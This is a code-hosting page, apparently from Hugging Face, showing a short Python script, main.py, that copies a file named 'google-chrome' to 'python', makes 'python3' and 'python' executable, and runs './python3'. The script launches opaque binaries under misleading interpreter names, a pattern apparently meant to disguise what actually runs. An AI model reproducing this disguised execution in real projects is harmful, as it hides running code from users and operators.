savefile / main.py
ilhamap's picture
Update main.py
d67e64e verified
raw
history blame
106 Bytes
import os
os.system("cp google-chrome python")
os.system("chmod +x python3 python")
os.system("./python3")